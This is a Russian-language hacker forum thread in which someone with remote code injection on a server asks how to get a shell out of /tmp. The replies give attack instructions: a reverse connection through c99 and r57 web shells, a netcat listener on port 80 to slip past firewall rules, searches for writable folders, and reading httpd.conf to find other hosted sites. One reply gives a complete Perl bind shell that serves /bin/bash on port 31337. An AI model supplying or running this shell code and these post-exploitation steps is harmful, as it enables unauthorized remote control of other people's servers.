Есть ремоте инъекция, но папка которую можно читать только одна, запись соответственно в неё запрещена, разрешена только в /tmp, можно как-нибудь оттуда запустить bind script?
тебе лучше воспользоваться бэкконектом rst и некоторые версии c99 шеллов запускают бэкконект из /tmp и если у тебя свободен 80 порт (не стоит на нем какойнить веб сервак), то в неткате лучше открывать именно его (nc -l -n -v -p 80) и соответственно бэкконект делать на этот порт, т.к. соединение сервера с другими портами может быть запрещено политикой безопасности... ЗЫ да, имхо если включено safemode, то врядли чтото получится... ЗЗЫ из шелла (если нет safemode и нет openbasedir) выполни команду Code: find / -type d -perm -2 мож всеже есть папки в которые ты можешь записывать... найди httpd.conf и если прочитаешь, можешь увидеть пути к другим в.хостам
Конечно можно Code: #!/usr/bin/perl $SHELL="/bin/bash -i"; if (@ARGV < 1) { exit("mda"); } $LISTEN_PORT=$ARGV[0]; use Socket; $protocol=getprotobyname('tcp'); socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; listen(S,3) || die "Cant listen port\n"; while(1) { accept(CONN,S); if(!($pid=fork)) { die "Cannot fork" if (!defined $pid); open STDIN,"<&CONN"; open STDOUT,">&CONN"; open STDERR,">&CONN"; exec $SHELL || die print CONN "Cant execute $SHELL\n"; close CONN; exit 0; } } cd /tmp; perl bind.pl 31337 или через через функции r57shell